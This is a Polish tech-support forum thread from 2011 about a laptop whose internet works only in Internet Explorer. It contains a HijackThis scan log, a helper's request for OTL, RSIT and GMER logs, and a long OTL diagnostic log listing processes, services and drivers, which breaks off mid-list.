szefcu45 utworzono 16 lipca 2011 utworzono 16 lipca 2011 (edytowane) Witam Piszę, otóż mam dziwny problem, Internet na laptopie działa mi tylko w internet explorerze. Sprawdzałem w mozilli, operze, chromie - nie działa. Skanowałem juz kompa FlashDisinfectorem, TrojanRemoverem, Avastem i wyczyściłem kompa ATFCleanerem, wszystkie infekcje jakie wykryły te programy usnąłem, ale to nie pomogło. Nie mam pomysłu co można jeszcze zrobić, dlatego wstawiam loga z HiJacka, mam nadzieję, że on coś pomoże i pomożecie zlokalizować źródło problemu. [log] Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 21:20:04, on 2011-07-15 Platform: Windows Vista (WinNT 6.00.1904) MSIE: Internet Explorer v7.00 (7.00.6000.16982) Boot mode: Normal Running processes: C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Windows\system32\taskeng.exe C:\Program Files\AVAST Software\Avast\AvastUI.exe C:\Windows\system32\wbem\unsecapp.exe C:\Windows\system32\wuauclt.exe C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = my.daemon-search.com R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.live.com R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://g.msn.com.pl/0SEPLPL/SAOS01?FORM=TOOLBR R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = O1 - Hosts: ::1 localhost O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O2 - BHO: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll O2 - BHO: ThinkVantage Password Manager - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll O3 - Toolbar: Show Norton Toolbar - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll O3 - Toolbar: avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll O3 - Toolbar: DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto O4 - HKLM\..\Run: [avast] "C:\Program Files\AVAST Software\Avast\avastUI.exe" /nogui O4 - HKLM\..\Run: [TrojanScanner] C:\Program Files\Trojan Remover\Trjscan.exe /boot O8 - Extra context menu item: &Windows Live Search - res://c:\Program Files\Windows Live Toolbar\msntb.dll/search.htm O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200 O8 - Extra context menu item: E&ksport do programu Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Wyślij obraz do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie_ctx.htm O8 - Extra context menu item: Wyślij stronę do urządzenia &Bluetooth... - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm O9 - Extra button: (no name) - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll O9 - Extra 'Tools' menuitem: ThinkVantage Password Manager... - {0045D4BC-5189-4b67-969C-83BB1906C421} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll O9 - Extra button: Badanie - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Program Files\ThinkPad\Bluetooth Software\btsendto_ie.htm O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe O23 - Service: Pure Networks Net2Go Service (nmraapache) - Pure Networks, Inc. - C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe O23 - Service: Pure Networks Network Magic Service (nmservice) - Pure Networks, Inc. - C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe O23 - Service: ThinkPad HDD APS Logging Service (TPHDEXLGSVC) - Lenovo. - C:\Windows\System32\TPHDEXLG.exe O23 - Service: TVT Backup Protection Service - Unknown owner - C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe O23 - Service: TVT Backup Service - Lenovo Group Limited - C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe -- End of file - 5594 bytes [/log]
wirusolog komentarz 16 lipca 2011 komentarz 16 lipca 2011 (edytowane) HijackThis to na dzisiejsze czasy zacofany program, z którego jedynie niektóre funkcje programowe mogą się przydać. Dużo szkodników omija HJT. Są inne programy do sprawdzania czy nie ma szkodników na komputerze. W takim razie wklej logi z [url=http://www.forumpc.pl/index.php?showtopic=104338][b][color=blue][u]OTL i RSIT[/url][/b][/color][/u] + [url=http://www.forumpc.pl/index.php?showtopic=116175][b][color=blue][u]GMER[/url][/b][/color][/u].
szefcu45 komentarz 18 lipca 2011 Autor komentarz 18 lipca 2011 (edytowane) Nie udało mi się uzyskać loga z gmera, ponieważ komp albo sie wyłączał albo wyskakiwał blue screen, ale mam logi z OTL i RSIT. Laptop posiada jedną partycję - C. OTL: [log] OTL logfile created on: 2011-07-18 10:25:13 - Run 1 OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation Internet Explorer (Version = 7.0.6000.16982) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 1,99 Gb Total Physical Memory | 1,00 Gb Available Physical Memory | 50,02% Memory free 4,21 Gb Paging File | 3,12 Gb Available in Paging File | 74,07% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 142,25 Gb Total Space | 46,21 Gb Free Space | 32,48% Space Free | Partition Type: NTFS Computer Name: Max-PC | User Name: Max | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: Off | File Age = 60 Days [color=#E56717]========== Processes (All) ==========[/color] PRC - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe PRC - [2011-07-04 13:43:54 | 003,493,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe PRC - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe PRC - [2011-04-04 15:24:56 | 002,923,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2011-04-04 15:22:57 | 000,007,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lsass.exe PRC - [2011-04-04 15:13:37 | 000,247,296 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wbem\WmiPrvSE.exe PRC - [2011-04-03 11:00:49 | 000,634,632 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Internet Explorer\iexplore.exe PRC - [2011-04-03 11:00:46 | 000,301,568 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Internet Explorer\ieuser.exe PRC - [2011-04-03 09:53:26 | 000,168,960 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmplayer.exe PRC - [2011-04-02 18:59:04 | 000,053,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wuauclt.exe PRC - [2008-11-10 22:09:11 | 002,605,568 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SLsvc.exe PRC - [2007-10-16 19:33:00 | 000,037,424 | ---- | M] (Lenovo.) -- C:\Windows\System32\TPHDEXLG.exe PRC - [2007-07-10 17:02:52 | 000,950,272 | ---- | M] (Lenovo Group Limited) -- C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe PRC - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe PRC - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe PRC - [2006-11-02 14:34:46 | 000,287,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SearchIndexer.exe PRC - [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\winlogon.exe PRC - [2006-11-02 11:45:57 | 000,095,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wininit.exe PRC - [2006-11-02 11:45:50 | 000,037,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wbem\unsecapp.exe PRC - [2006-11-02 11:45:48 | 000,166,400 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskeng.exe PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:47 | 000,022,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\svchost.exe [comLaunch] PRC - [2006-11-02 11:45:46 | 000,124,928 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\spoolsv.exe PRC - [2006-11-02 11:45:45 | 000,062,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\smss.exe PRC - [2006-11-02 11:45:40 | 000,279,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\services.exe PRC - [2006-11-02 11:45:21 | 000,210,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lsm.exe PRC - [2006-11-02 11:45:04 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dwm.exe PRC - [2006-11-02 11:45:00 | 000,007,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\csrss.exe [color=#E56717]========== Modules (All) ==========[/color] MOD - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe MOD - [2011-07-04 13:43:51 | 000,199,792 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\snxhk.dll MOD - [2011-04-04 15:45:16 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\atl.dll MOD - [2011-04-04 15:44:10 | 000,297,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\gdi32.dll MOD - [2011-04-04 15:34:10 | 000,425,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\netapi32.dll MOD - [2011-04-04 15:28:32 | 011,315,712 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shell32.dll MOD - [2011-04-04 15:22:57 | 000,072,704 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\secur32.dll MOD - [2011-04-04 15:15:47 | 000,040,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\srclient.dll MOD - [2011-04-04 15:07:43 | 000,875,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\kernel32.dll MOD - [2011-04-04 10:47:15 | 000,788,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\rpcrt4.dll MOD - [2011-04-03 11:03:18 | 000,024,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\lpk.dll MOD - [2008-11-10 22:13:34 | 001,585,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\setupapi.dll MOD - [2008-11-10 22:13:34 | 000,558,080 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\oleaut32.dll MOD - [2008-11-10 22:04:00 | 000,633,856 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\user32.dll MOD - [2006-11-02 14:36:16 | 000,138,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\spp.dll MOD - [2006-11-02 11:47:26 | 001,162,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ntdll.dll MOD - [2006-11-02 11:46:16 | 000,126,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\xmllite.dll MOD - [2006-11-02 11:46:14 | 000,288,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\Wldap32.dll MOD - [2006-11-02 11:46:14 | 000,178,688 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ws2_32.dll MOD - [2006-11-02 11:46:13 | 001,064,960 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shdocvw.dll MOD - [2006-11-02 11:46:13 | 000,994,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\vssapi.dll MOD - [2006-11-02 11:46:13 | 000,502,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\usp10.dll MOD - [2006-11-02 11:46:13 | 000,339,968 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\shlwapi.dll MOD - [2006-11-02 11:46:13 | 000,240,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\uxtheme.dll MOD - [2006-11-02 11:46:13 | 000,107,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\userenv.dll MOD - [2006-11-02 11:46:13 | 000,073,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\vsstrace.dll MOD - [2006-11-02 11:46:13 | 000,020,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\version.dll MOD - [2006-11-02 11:46:12 | 001,314,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ole32.dll MOD - [2006-11-02 11:46:12 | 000,733,696 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\propsys.dll MOD - [2006-11-02 11:46:12 | 000,120,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ntmarta.dll MOD - [2006-11-02 11:46:12 | 000,088,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\olepro32.dll MOD - [2006-11-02 11:46:12 | 000,056,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\samlib.dll MOD - [2006-11-02 11:46:12 | 000,012,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\psapi.dll MOD - [2006-11-02 11:46:12 | 000,010,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\nsi.dll MOD - [2006-11-02 11:46:10 | 000,681,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msvcrt.dll MOD - [2006-11-02 11:46:06 | 000,805,888 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msctf.dll MOD - [2006-11-02 11:46:05 | 000,115,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\imm32.dll MOD - [2006-11-02 11:46:05 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mpr.dll MOD - [2006-11-02 11:46:03 | 000,454,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\comdlg32.dll MOD - [2006-11-02 11:46:02 | 000,770,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\advapi32.dll MOD - [2006-11-02 11:46:02 | 000,523,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\clbcatq.dll MOD - [2006-11-02 11:46:02 | 000,171,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\apphelp.dll MOD - [2006-11-02 11:46:02 | 000,078,848 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\authz.dll MOD - [2006-11-02 11:44:49 | 000,110,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msscript.ocx MOD - [2006-11-02 11:44:42 | 000,255,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\winspool.drv MOD - [2006-11-02 11:38:57 | 001,648,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.6000.16386_none_5d07289e07e1d100\comctl32.dll [color=#E56717]========== Win32 Services (SafeList) ==========[/color] SRV - File not found [Disabled | Stopped] -- -- (Harmonogram automatycznej usługi LiveUpdate) SRV - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus) SRV - [2010-01-15 14:49:20 | 000,227,232 | ---- | M] (McAfee, Inc.) [Disabled | Stopped] -- C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe -- (McComponentHostService) SRV - [2008-11-10 22:07:42 | 000,265,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008-11-10 14:37:17 | 001,174,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe -- (Symantec Core LC) SRV - [2008-01-29 17:38:32 | 000,583,048 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service) SRV - [2007-09-26 16:23:26 | 002,999,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_2.EXE -- (LiveUpdate) SRV - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () [Auto | Running] -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe -- (TVT Backup Protection Service) SRV - [2007-07-10 16:37:38 | 000,644,408 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe -- (ThinkVantage Registry Monitor Service) SRV - [2007-07-10 15:40:14 | 000,045,056 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe -- (tvtnetwk) SRV - [2007-07-05 16:48:54 | 000,206,120 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe -- (AcSvc) SRV - [2007-07-05 16:48:50 | 000,091,432 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe -- (AcPrfMgrSvc) SRV - [2007-06-07 17:43:46 | 000,013,312 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- c:\Program Files\Lenovo\System Update\SUService.exe -- (SUService) SRV - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) [Auto | Running] -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe -- (nmservice) SRV - [2007-03-14 16:42:22 | 000,012,800 | ---- | M] (Pure Networks, Inc.) [On_Demand | Stopped] -- C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe -- (nmraapache) SRV - [2007-03-02 07:07:28 | 000,055,936 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe -- (TPHKSVC) SRV - [2007-01-30 05:05:02 | 000,108,080 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Windows\System32\IPSSVC.EXE -- (IPSSVC) SRV - [2007-01-14 01:11:06 | 000,080,504 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Norton Internet Security\isPwdSvc.exe -- (ISPwdSvc) SRV - [2007-01-12 21:40:58 | 000,049,248 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe -- (comHost) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (LiveUpdate Notice Ex) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (CLTNetCnService) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccSetMgr) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccEvtMgr) SRV - [2007-01-05 02:19:28 | 000,047,712 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe -- (SymAppCore) SRV - [2006-11-15 17:20:46 | 000,634,988 | ---- | M] (Diskeeper Corporation) [Disabled | Stopped] -- C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe -- (Diskeeper) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx) DRV - [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswSP.sys -- (aswSP) DRV - [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi) DRV - [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr.sys -- (aswRdr) DRV - [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt) DRV - [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk) DRV - [2008-11-10 14:39:02 | 000,115,000 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SYMEVENT.SYS -- (SymEvent) DRV - [2008-05-02 10:58:14 | 000,008,064 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\usbser_lowerflt.sys -- (upperdev) DRV - [2008-05-02 10:58:12 | 000,017,536 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ccdcmb.sys -- (nmwcd) DRV - [2007-12-06 19:11:00 | 000,012,080 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\TPPWR32V.SYS -- (TPPWRIF) DRV - [2007-10-16 19:33:00 | 000,103,472 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\Apsx86.sys -- (Shockprf) DRV - [2007-10-16 19:32:00 | 000,019,504 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\ApsHM86.sys -- (TPDIGIMN) DRV - [2007-05-22 16:59:38 | 000,030,336 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tvti2c.sys -- (TVTI2C) DRV - [2007-05-22 09:59:34 | 000,021,376 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\psadd.sys -- (psadd) DRV - [2007-04-29 23:45:18 | 002,219,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw4v32.sys -- (NETw4v32) Sterownik karty Intel(R) DRV - [2007-04-27 08:29:54 | 000,215,040 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CHDARTN.sys -- (HdAudAddService) DRV - [2007-04-10 03:59:00 | 000,008,704 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2007-01-11 20:22:20 | 000,276,792 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtspl.sys -- (SRTSPL) DRV - [2007-01-11 20:22:18 | 000,025,400 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\drivers\srtspx.sys -- (SRTSPX) DRV - [2007-01-11 20:22:14 | 000,247,608 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtsp.sys -- (SRTSP) DRV - [2007-01-10 03:00:00 | 000,833,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVEX15.SYS -- (NAVEX15) DRV - [2007-01-10 03:00:00 | 000,387,384 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl) DRV - [2007-01-10 03:00:00 | 000,102,712 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv) DRV - [2007-01-10 03:00:00 | 000,080,408 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVENG.SYS -- (NAVENG) DRV - [2007-01-09 16:32:14 | 000,191,544 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\Drivers\SYMTDI.SYS -- (SYMTDI) DRV - [2007-01-09 16:32:14 | 000,145,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMFW.SYS -- (SYMFW) DRV - [2007-01-09 16:32:14 | 000,040,120 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMIDS.SYS -- (SYMIDS) DRV - [2007-01-09 16:32:14 | 000,038,200 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMNDISV.SYS 